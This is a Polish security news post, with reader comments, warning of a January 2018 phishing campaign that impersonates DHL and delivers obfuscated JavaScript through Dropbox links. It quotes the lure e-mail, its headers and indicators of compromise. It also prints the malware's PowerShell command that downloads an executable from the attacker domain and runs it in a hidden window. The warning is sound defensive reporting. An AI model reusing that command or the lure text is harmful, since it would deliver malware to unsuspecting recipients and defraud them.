16:08
16/1/2018

Na skrzynki Polaków właśnie zaczęły spływać e-maile w których ktoś podszywa się pod DHL. W e-mailu znajduje się link do serwisu Dropbox, z którego pobierany jest złośliwy plik Javascript.

Jak wygląda złośliwa wiadomość?

Od: DHL Express (Poland) Sp. z.o.o. 9629661472
Od: DHL Express (Poland) Sp. z.o.o. 4616831668
Temat: Agencja Celna DHL – przesylka numer: 3752336594
Temat: Agencja Celna DHL – przesylka numer: 1132383655

Szanowni Panstwo,

Staralismy sie dostarczyc twoja przesylke 10-01-2018, 14:05:01.
Staralismy sie dostarczyc twoja przesylke 10 stycznia 2018 roku, 13:50:29.

Konto / Numer kwitu: 7224696748
Konto / Numer kwitu: 9452227212
Prosimy o wplate: 822,66 PLN
Prosimy o wplate: 878,23 PLN
Klasa: Terminowe uslugi dostawy
Usluga (F): potwierdzenie odbioru
Statusu: Zawiadomienie wyslane
Pobierz fakture

Z pozdrowieniami,
DHL Express (Poland).

Dziekujemy za zaufanie i powierzanie nam wysylek,
DHL Parcel.

Nagłówki:
Received: from mail4.zenbox.pl ([127.0.0.1]) by mail4.zenbox.pl (mail4.zenbox.pl [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id mJ6y2P2nkQLo for ; Tue, 16 Jan 2018 15:05:04 +0100 (CET)
Received: from dhl-u.com (dhl-u.com [178.208.77.196]) by mail4.zenbox.pl (Postfix) with ESMTPS id 2518B183E935 for ; Tue, 16 Jan 2018 15:05:03 +0100 (CET)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=dhl-u.com;
s=mail; h=Message-Id:List-Unsubscribe:Content-Type:MIME-Version:Date:Subject :To:From:Sender:Reply-To:Cc:Content-Transfer-Encoding:Content-ID: Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc :Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Subscribe: List-Post:List-Owner:List-Archive; bh=ayriZ3/WScL2iouc89Tds1YvAUZ2JuOhHB3M5Uwvcyg=; b=LjZ20f/6nozOGSgHOTVFa4zj1F NpSeTHFJr42LN72spn4IiSvPZopikfQLJEB+ZTvW+qgf7oNHspUgJodmCUOgZzZEXwimQNxt5NuAK hWlA+XHykAtthmYTPXnMZbQePKmceLQwDey16pMemEzQTh2PHCvp+edVh1jFQS1Iz6YY=;
MessageID: FE044DE173A7886BB7B2FB6490ED2462@dhl-u.com
X-Mailer: AOL 8.0 for Windows US sub 230
List-Unsubscribe: mailto:FE044DE173A7886BB7B2FB6490ED2462@dhl-u.com
Message-Id: E1ebRrL-0005Cg-Dv@v220946.vps.mcdir.ru

Received: from dhl-saw.com (dhl-saw.com [178.208.80.67])
by xxx.nazwa.pl (Postfix) with ESMTP id 4389623525C
for ; Tue, 16 Jan 2018 14:50:32 +0100 (CET)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=dhl-saw.com
; s=mail; h=Message-Id:List-Unsubscribe:Content-Type:MIME-Version:Date:
Subject:To:From:Sender:Reply-To:Cc:Content-Transfer-Encoding:Content-ID:
Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc
:Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Subscribe:
List-Post:List-Owner:List-Archive;
bh=p+qLcN834BZb4+fEXjJkEK1J9xalNZqc5938FKLMZ/s=; b=DrwRXKZcQ/b9D966VXHAJm7Nf3
gF+NkRmEVbpYWGiQlNPnvL3EPIXGs/zxtWTSNMX58KNkUf6srPmkocbrH8iZARumecjTX+OMOLHU6
Wpdd+Af3h/tu1edLQXhh734IhYZD2tZxMIJIrn+/o/X/ILG4vyZWx2cR7Cfwyr7uO3Gs=;
MessageID: 9268218DD20629CA16135AC531DCB87C@dhl-saw.com
X-Mailer: Apple Mail (2.1244.3)
List-Unsubscribe: mailto:9268218DD20629CA16135AC531DCB87C@dhl-saw.com
Message-Id: E1ebRdH-00055l-H8@v220957.vps.mcdir.ru

Link prowadzi do:

hxxps://www.dropbox[.]com/s/okh1b6wvzcbo09a/Faktura_VAT_06782183627.js?dl=1
hxxps://www.dropbox[.]com/s/11fqly45bo5mmt5/Faktura_VAT_54785544425.js?dl=1

i zawiera zobfuscowany plik, który po uruchomieniu pobiera złośliwe oprogramowanie z domeny hxxps://dhl-bez[.]com/sectools.php następującym poleceniem i uruchamia je:

cmd.exe /c powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('https://dhl-bez.com/sectools.php?YoXwSm','%apPdAtA%YQl89.eXE'); staRt-prOceSS '%appDatA%YQl89.exe'

IOC

dhl-bez.com has address 188.120.253.240

Domain Name: DHL-BEZ.COM
Registry Domain ID: 2111683201_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.reg.com
Registrar URL: http://www.reg.ru
Updated Date: 2018-01-15T08:22:55Z
Creation Date: 2017-04-06T10:22:40Z
Registry Expiry Date: 2018-04-06T10:22:40Z
Name Server: NS1.REG.RU
Name Server: NS2.REG.RU
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

inetnum: 188.120.253.0 - 188.120.253.255
netname: THEFIRST-NET
descr: TheFirst-RU customers (WebDC Msk)
org: ORG-FVDS1-RIPE
country: RU
admin-c: FRST3-RIPE
tech-c: FRST3-RIPE

SHA:
6b4f523f357a4d6a8f847465edf82922e7c1d1e563f0446633bbf8bb28c835be
21d700a4d04b9f8f3bfaa57742b7f8dc01e4fc636e31a54fd9b1a96793b2ae3d

PS. Dziękujemy czytelnikom, którzy podesłali nam próbki i treści e-maili.

Przeczytaj także:

20 komentarzy

Dodaj komentarz
  1. Ktoś się jeszcze na to łapie?

    • Wlasciwe pytanie: To jakis OS sie jeszcze na to łapie?

    • Niestety tak. Byłem świadkiem jak przyjechał koleś pod odbiór paczki. Pan mu powiedział, że to nie jest numer przesyłki DHL i zapytał skąd ma ten numer. Pan odpowiedxiał, że dostał email…. Zapytaliśmy go, czy czeka na jakąś przesyłkę DHL? Nie czekał….To się go pytamy, po co Pan to klikasz…. odpowiedź: – ja nie wiedziałem :-) Zachęcam więc do takich działań, bo już czasem nie mogę patrzeć na naiwność ludzi i chyba sam zacznę się w to bawić :-)

  2. Niestety dość sporo osób ;/

  3. To już nawet śmieszne nie jest. Ktoś się jeszcze na to łapie?

  4. Dokładnie takiego mejla dostałem jakies 12dnintemu

  5. A taki zbieg okoliczności – zamawiałem z pół roku temu przez aukcję przedmiot, który został dostarczony DHLem i w tymże czasie dostałem 2 spamy podszywające się pod DHL. Po linkach nie klikałem z wiadomych powodów i tylko wtedy dostałem tego typu udawanej wiadomości od firmy spedycyjnej.
    Ale zakładając że nie było to zupełnie przypadkowe, gdzie najprawdopodobniej zawodzi poufność danych?

  6. https://www.tvn24.pl/falszywy-adres-mailowy-na-stronie-ambasady,807265,s.html

    Może pokusicie się o wyjaśnienie tego?

  7. Jako admin muszę wam powiedzieć że w tygodniu mam 2-4 takie kampanie phishingowe i na 500-600 userów ( w zależności na ile kont pójdzie) od 2 do 5 się łapie. Tych 2-5 wystarczy żeby narobić kłopotów. tzn u mnie to wyłudzenie haseł (logowanie na podrobionych stronach) ale naprawdę ludzie jeszcze sporo musza się nauczyć.

    • Jeden z prowadzących szkolenie od bezpieczeństwa powiada że od 10 lat nic się nie zmienia w podejściu do bezpieczeństwa, że ciągle ludzi popełniają te same błędy, że od 10 lat nie uczą się na błędach.
      Zgadzam się.
      Ataki stare jak świat (inna oprawa graficzna), zasada ta sama i wynik końcowy taki sam.
      Smutek, smutek, smutek

    • To dlaczego takie oczywiste spamy przepuszczasz do ludzi ? Ludzie jak to ludzie, statystycznie zawsze ktoś gdzieś kliknie więc trzeba im ograniczać spam.

    • @ja ok, jak ? masz jakiś pomysł ?

  8. I znowu SPAM i próby wyłudzania z serwerów nazwa.pl :-/ 99,5% maili w skrzynce pocztowej pochodzą od serwerów zakupionych w nazwa.pl

    • to wina “promocji” gdzie domenę dostaje się za 1zł, a serwer za jeszcze mniej i kiedy nie ma się w planach opłacenie usługi po roku bo się wysyła spam to nagle wszystko sie zaczyna opłacać ;)

  9. Hmmm…
    Tak sobie myślę, czy nie prostszym rozwiązaniem jest stworzenie takiego systemu (przynajmniej d użytku służbowego – w pracy), który wyeliminowałby błąd ludzki. Zdaję sobie sprawę, że taki użytkownik miałby dość ograniczone możliwości ale do wykonywania pracy w zupełności by to wystarczyło. Lepiej lub gorzej robią tak już duże korporacje i banki oraz wiele firm. Do prawdziwego bezpieczeństwa jeszcze daleko. Taki “odporny” system jest trudny do zaprojektowania ale nikt chyba nie sądzi, że nie możliwy…

  10. Atak starszy od węgla. Warto odświeżyć/uzupełnić regułki antyspama aby to wyeliminować.

  11. a ten powershell.exe – do czegoś potrzebny przy zwykłym użytkowaniu, może dało by się go wyłączyć

  12. Wspaniałe czasy, w końcu można nie odpisywać na wiadomości, nie klikać w linki, które się dostaje :) Wczoraj wieczorem żona pytała się mnie, czemu nie odebrałem telefonu, gdy dzwoniła!

    A ja na to: Z uwagi na prawdopodobieństwo podszycia się pod ciebie Kochanie!

  13. Polecam popatrzeć sobie na http://www.dhlsaver.com i potem zastanowić się nad tym jak bardzo DHL dba o bezpieczeństwo swoich klientów.

    Tak, wbrew wszystkiemu ta strona jest w pełni oficjalną stroną DHL

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.